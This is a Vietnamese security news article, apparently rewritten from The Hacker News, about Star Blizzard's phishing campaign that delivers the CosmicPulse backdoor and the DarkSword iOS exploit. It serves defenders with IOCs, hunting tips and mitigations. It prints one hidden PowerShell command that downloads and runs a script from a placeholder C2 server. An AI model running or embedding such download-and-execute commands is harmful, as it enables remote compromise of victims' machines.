Mối đe dọa

Phân tích chiến dịch gián điệp mạng của Star Blizzard nhắm vào các tổ chức quốc tế

Nhóm tin tặc Star Blizzard (FSB Nga) đang triển khai chiến dịch tấn công tinh vi sử dụng email giả mạo sự kiện để phát tán backdoor CosmicPulse và khai thác DarkSword.

RSS Source
RSS SourceAI Rewrite
Thời gian đọc: ~1 phút
Russia's Star Blizzard Targets 100+ Organizations With Fake Event Invites to Deliver Backdoor
  • Đối tượng tấn công: Các tổ chức, think tank và NGO liên quan đến chính sách Ukraine tại Mỹ, Anh và quốc tế.
  • Kỹ thuật chủ đạo: Sử dụng email lừa đảo (Phishing) kết hợp kỹ thuật RedFlick và ClickFix để thực thi mã độc từ xa.
  • Payload nguy hiểm: Backdoor Python mang tên CosmicPulse và bộ công cụ khai thác iPhone DarkSword.
  • Khuyến nghị: Kiểm tra các tác vụ Windows (Scheduled Tasks) bất thường và áp dụng phương thức xác thực chống phishing.

1. Bối cảnh chiến dịch tấn công

Nhóm tin tặc Star Blizzard, được các cơ quan an ninh quốc tế xác định hoạt động dưới sự chỉ đạo của Trung tâm 18 thuộc Cơ quan An ninh Liên bang Nga (FSB), đang gia tăng cường độ các chiến dịch gián điệp mạng. Kể từ tháng 01/2024, nhóm này đã thực hiện hơn 13 chiến dịch quy mô lớn, nhắm mục tiêu vào hơn 100 tổ chức trên toàn cầu, đặc biệt là các thực thể có liên quan đến chính sách hỗ trợ Ukraine.

Khác với các chiến dịch trước đây sử dụng dịch vụ email miễn phí như Proton, từ tháng 03/2024, Star Blizzard đã chuyển hướng sang khai thác các tài khoản email trên nền tảng WordPress và cPanel bị chiếm quyền điều khiển để tăng độ tin cậy cho các email lừa đảo. Các email này thường giả mạo lời mời tham gia hội nghị từ các tổ chức uy tín như Chatham House hoặc Atlantic Council.

2. Phân tích Kỹ thuật & Chuỗi tấn công (Kill Chain)

Chiến dịch này thể hiện sự tiến hóa rõ rệt trong TTPs (Tactics, Techniques, and Procedures) của Star Blizzard. Thay vì các phương thức truyền thống, nhóm đã áp dụng kỹ thuật RedFlick để duy trì sự hiện diện bền vững trên hệ thống nạn nhân.

2.1. Chuỗi lây nhiễm (Infection Chain)

Quy trình tấn công bắt đầu bằng việc gửi email không đính kèm tệp tin để tránh các bộ lọc bảo mật. Khi nạn nhân phản hồi, kẻ tấn công sẽ gửi một tệp nén (RAR/ZIP) được bảo vệ bằng mật khẩu, với mật khẩu được hiển thị dưới dạng hình ảnh để vượt qua các công cụ quét nội dung tự động.

  • Giai đoạn 1 (LNK Execution): Tệp shortcut (.LNK) giả dạng PDF được thực thi, kích hoạt lệnh tải xuống trình cài đặt (MSI) từ máy chủ C2.
  • Giai đoạn 2 (Persistence): Sử dụng Windows Installer để thiết lập 3 tác vụ định kỳ (Scheduled Tasks) nhằm duy trì quyền truy cập.
  • Giai đoạn 3 (Payload Delivery): Cài đặt backdoor CosmicPulse (dựa trên Python) hoặc bộ khai thác DarkSword đối với các mục tiêu sử dụng iPhone.

2.2. Chi tiết các tác vụ độc hại

Kẻ tấn công ngụy trang các tác vụ dưới tên gọi hệ thống để đánh lừa quản trị viên:

  • Internet Quality Test Connection: Gửi thông tin định danh máy tính (Hostname, Username) về C2.
  • Network Configuration Manager: Thiết lập WebDAV để mở rộng khả năng truy cập tệp tin từ xa.
  • System Health Monitor: Sử dụng control.exe để thực thi các giai đoạn tiếp theo của mã độc.
# Ví dụ về cấu trúc lệnh thực thi ngầm qua LNK file (đã lược giản)powershell.exe -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('http://c2-server/payload.ps1')"

3. Dấu hiệu Nhận biết & Bảng Chỉ số IOCs

Việc phát hiện sớm các dấu hiệu xâm nhập là yếu tố then chốt để ngăn chặn sự lây lan của CosmicPulse và các biến thể liên quan.

Loại thực thểGiá trị / Chỉ sốMô tả tác động
Domainsecure-dns-hub[.]comMáy chủ C2 chính
IP Address103.160.59[.]97Địa chỉ IP hạ tầng C2
BackdoorCosmicPulsePython-based backdoor
ToolDarkSwordExploit kit cho iOS

4. Hướng dẫn Phát hiện (Threat Hunting)

Để săn tìm mối đe dọa trong môi trường doanh nghiệp, các đội ngũ SOC cần tập trung vào các nhật ký (logs) từ Microsoft Defender hoặc các giải pháp SIEM/EDR.

  • Truy vấn KQL (Microsoft Sentinel/Defender): Tìm kiếm các tác vụ định kỳ có tên trùng khớp với danh sách đã nêu.
  • Giám sát SSH: Kiểm tra các kết nối SSH outbound bất thường từ các máy trạm không thuộc nhóm quản trị hệ thống.
  • Phân tích hành vi: Theo dõi các tiến trình con của control.exe có dấu hiệu thực thi script hoặc tải xuống tệp tin từ internet.

5. Biện pháp Khắc phục & Khuyến nghị Phòng thủ

⚠️ Cảnh báo quan trọng: Các tổ chức cần ngay lập tức rà soát các tác vụ định kỳ (Scheduled Tasks) và cập nhật hệ điều hành iOS lên phiên bản mới nhất để vô hiệu hóa DarkSword.

  • Hardening hệ thống: Kích hoạt các quy tắc Attack Surface Reduction (ASR) để chặn các tệp thực thi không đáng tin cậy và các script bị làm rối (obfuscated).
  • Xác thực an toàn: Chuyển đổi sang các phương thức xác thực chống phishing (FIDO2/WebAuthn) để vô hiệu hóa các công cụ như Evilginx.
  • Quản lý kết nối: Chặn hoặc giới hạn các kết nối SSH outbound không cần thiết thông qua Firewall/GPO.
  • Cập nhật thiết bị: Đảm bảo iPhone được cập nhật lên iOS 26.3 trở lên hoặc kích hoạt Lockdown Mode đối với các thiết bị có nguy cơ cao.

Tham khảo thêm thông tin chi tiết về các kỹ thuật tấn công tại MITRE ATT&CK Framework để xây dựng chiến lược phòng thủ chiều sâu.

Tổng hợp, và phân tích kỹ thuật từ:The Hacker News
Xem bài gốc

Mạng Lưới An Ninh Mạng & Cộng Đồng

24/7 Alerts

Nhận cảnh báo 0-Day khẩn cấp, phân tích mã độc và tham gia thảo luận kỹ thuật cùng chuyên gia.

RSS Source

Ban biên tập nội dung và phân tích an ninh mạng tại ADSECVN.COM.

Bài Viết Liên Quan

Cùng chuyên mục & chủ đề